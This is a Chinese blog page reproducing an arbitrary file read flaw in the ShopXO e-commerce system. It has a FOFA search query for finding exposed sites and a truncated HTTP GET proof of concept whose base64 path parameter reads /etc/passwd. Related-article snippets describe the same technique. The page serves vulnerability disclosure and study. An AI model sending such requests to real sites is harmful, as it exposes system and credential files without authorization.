【漏洞复现】ShopXO任意文件读取漏洞

最新推荐文章于 2025-03-12 15:26:37 发布

晚风不及你ღ

最新推荐文章于 2025-03-12 15:26:37 发布

阅读量2.4k

点赞数 16

CC 4.0 BY-SA版权

文章标签：安全 web安全网络

本文链接：https://blog.youkuaiyun.com/qq_37113223/article/details/136443362

【漏洞复现】专栏收录该内容

150 篇文章

已下架不支持订阅

本文介绍了ShopXO电子商务系统存在的任意文件读取漏洞，详细描述了漏洞情况，并提供了产品简介、漏洞复现步骤及修复建议。ShopXO是一款基于ThinkPHP5.1开发的多终端电商系统，此漏洞可能被攻击者利用来获取敏感信息。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Nx01 产品简介

ShopXO是一套开源的企业级开源电子商务系统，包含PC、H5、微信小程序、支付宝小程序、百度小程序等多个终端，遵循Apache2开源协议发布，基于ThinkPHP5.1框架研发。该系统具有求实进取、创新专注、自主研发、国内领先企业级B2C电商系统解决方案等特点，可满足99%的电商运营需求。

Nx02 漏洞描述

ShopXO存在任意文件读取漏洞，攻击者可利用该漏洞获取敏感信息。

Nx03 产品主页

fofa-query: app="ShopXO企业级B2C电商系统提供商"

Nx04 漏洞复现

POC：

GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
Host: {
  
  {Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,applicat

了解本专栏

已下架不支持订阅

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

晚风不及你ღ

关注关注

16
点赞
踩
11

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

已下架不支持订阅

ShopXO download 任意文件读取

「我唯一会的和擅长的只有网络安全，如果我不能在我最擅长的事情上取得成功，那么我根本不知道，我的人生还有什么意义。」

10-14

728

道虽远，行则易至；儒虽难，坚为易成

【漏洞复现】金和OA C6 FileDownLoad.aspx 任意文件读取漏洞复现

m0_71944965的博客

12-31

189

金和OA C6 FileDownLoad.aspx接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件系统配置文件)、数据库配置文件等等，导致网站处于极度不安全状态。

参与评论您还未登录，请先登录后发表或查看评论

shopxo 文件读取（CNVD-2021-15822）

qq_23003811的博客

07-25

1480

ShopXO是一套开源的企业级开源电子商务系统。ShopXO存在任意文件读取漏洞，攻击者可利用该漏洞获取敏感信息。1、访问payload，其中L2V0Yy9wYXNzd2Q=是/etc/passwd的base64编码。

【vulfocus复现】shopxo文件读取

MXPXT的博客

12-29

6617

vulfocus-shopxo文件读取入门1.命令执行漏洞2.目录浏览漏洞初级1.shopxo 文件读取（CNVD-2021-15822）入门 1.命令执行漏洞打开后命令执行一句话直接给出，复制粘贴即可 2.目录浏览漏洞描述: 目录浏览漏洞属于目录遍历漏洞的一种，目录浏览漏洞是由于网站存在配置缺陷，存在目录可浏览漏洞，这会导致网站很多隐私文件与目录泄露，比如数据库备份文件、配置文件等，攻击者利用该信息可以更容易得到网站权限，导致网站被黑。风险：攻击者通过访问网站某一目录时，该目录没有默认首页文件

ShopXO文件读取(CNVD-2021-15822)

m0_65150886的博客

01-22

1496

ShopXO是一套开源的企业级开源电子商务系统。ShopXO存在任意文件读取漏洞，攻击者可利用该漏洞获取敏感信息。3.将要访问的文件进行base64编码，我这里选取的是/etc/passwd。1.访问http://ip:port，出现如下页面，开始实验。4.修改get请求，读取/etc/passwd。2.使用burp抓取页面的包，并发至重发器。

【春秋云镜】CVE-2021-41938-ShopXO CMS 2.2.0. 后台管理页面存在任意文件上传漏洞

HMX404的博客

01-29

857

ShopXO CMS 2.2.0. 后台管理页面存在任意文件上传漏洞。

任意文件读取/下载漏洞及攻防详解

最新发布

Kangyan6的博客

03-12

1987

任意文件读取/下载漏洞，是指攻击者可以通过某些漏洞，绕过应用程序的限制，直接读取或下载应用程序之外的文件。由于一些网站的需求，可能会提供文件查看与下载的功能，如果不对目标文件做限制，就可以查看或下载任意文件。总体来说，任意文件下载漏洞的利用主要是为了信息收集，我们通过对服务器敏感文件的下载，获取到大量的配置信息、源码，从而根据获取的信息来进一步挖掘服务器漏洞从而入侵。然后逐个下载我们需要审计的代码文件，如果文件没有被解析，显示的是文件源代码，就说明是任意文件读取与下载（目录穿越，目录穿透）漏洞。

[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268)

qq_51577576的博客

03-13

1476

[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268) 在ImageMagick 7.1.0-51版本及以前存在CVE-2022-44268漏洞。 ImageMagick 7.1.0-49 容易受到信息泄露的攻击。当它解析PNG图像（例如，调整大小）时，生成的图像可能嵌入了任意远程文件的内容（如果ImageMagick二进制文件有权读取它）。

泛微OA xmlrpcServlet接口任意文件读取漏洞（CNVD-2022-43245）

12-25

泛微OA xmlrpcServlet接口任意文件读取漏洞（CNVD-2022-43245），可以指定文件路径进行读取，并提供检测方案

houyusen#poc#ShopXO v1.8.0 后台getshell1

07-25

一、漏洞简介二、漏洞影响三、复现过程

solly0880#wiki#若依管理系统后台任意文件读取 CNVD-2021-019311

07-25

若依(RuoYi)管理系统后台任意文件读取漏洞描述若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件漏洞影响app="

ShopXO免费开源商城v1.8.0版本免费下载了

03-10

ShopXO 国内领先企业级B2C免费开源电商系统！求实进取、创新专注、自主研发、国内领先企业级B2C电商系统解决方案。遵循Apache2开源协议发布，无需授权、可商用、可二次开发、满足99%的电商运营需求。 PC+H5、支付宝小程序、微信小程序、百度小程序、头条&抖音小程序、QQ小程序。分销、秒杀、优惠券、会员等级、钱包、等等更多的高级应用。官网地址：http://shopxo.net/ 演示地址：http://demo.shopxo.net/ （管理账户/密码可进入官网查看）

[文件读取]shopxo 文件读取（CNVD-2021-15822）

wj33333的博客

11-14

1338

描述: ShopXO是一套开源的企业级开源电子商务系统。ShopXO存在任意文件读取漏洞，攻击者可利用该漏洞获取敏感信息。s=/index/qrcode/download/url/+文件base64。将/etc/passwd转为base64编码lh。将/tmp/flag转为base64编码。将要访问的文件进行编码。

任意文件读取/下载漏洞总结

热门推荐

未完成的歌~的博客

04-01

2万+

任意文件读取/下载漏洞（Arbitrary File Read/Download Vulnerability），是指攻击者可以通过某些漏洞，绕过应用程序的限制，直接读取或下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用该漏洞，从而读取或下载他们本来无权访问的文件，如密码、私钥、证书等，会提供攻击者更多可用信息，提高被入侵的风险。

cl.xoas.pw index.php,shopxo代码审计

weixin_34005314的博客

04-01

648

由于工作原因，分析了很多的cms也都写过文章，不过觉得好像没什么骚操作都是网上的基本操作，所以也就没发表在网站上，都保存在本地。最近突然发现自己博客中实战的东西太少了，决定将以前写的一些文章搬过来，由于当时写的初4是给自己留个记录，以后方便查看，所以写的都很简单，只有代码审计和复现，没有详细写挖掘中遇到的一些坑。以后写的文章中会尽量写详细的-----------------------------...

ShopXO商城系统文件上传0Day代审历程

土豆的博客

09-05

2615

这两天攻防中，某政局内网横向发现多网段服务器，该服务器搭建了ShopXO商城系统(后来发现是开发临时搭建的，准备做二开用的)。结果花了30来秒审了个垃圾Day拿下该服务器，本文就是给新手提供思路（没交cnvd，懒）

渗透测试|shopXO后台全版本获取Shell复现

qq_45521281的博客

05-29

6841

shopxo是一款开源的企业级商城系统，基于thinkphp5框架开发。这几天做了“[GKCTF2020]老八小超市儿”这道题，学到了后台获取shell的一个技巧，所以在这里复现一下。提供一个搜索语法：title=“ShopXO企业级B2C电商系统提供商”（不要干坏事哦）渗透测试复现页面来自buuctf——[GKCTF2020]老八小超市儿。ShopXO全版本getshell流程走起：进入题目（网上随便可以通过搜索找到一个使用shopxo搭建的演示站）别的漏洞没找到，尝试访问默认登陆后台，后台页

漏洞介绍及修复建议（漏洞汇总，建议收藏后期会不断更新）

Alone hackers的博客

03-07

8356

漏洞介绍及修复建议（漏洞汇总，建议收藏后期会不断更新）

jQuery-1.7.2版漏洞利用与任意文件读取防范

漏洞的性质是一个任意文件读取漏洞，这意味着任何拥有一定网络知识的攻击者都可以利用这个漏洞，通过浏览器对目标服务器发起请求，读取服务器上的任意文件。这种漏洞的存在是非常严重的，因为它可能导致敏感文件的...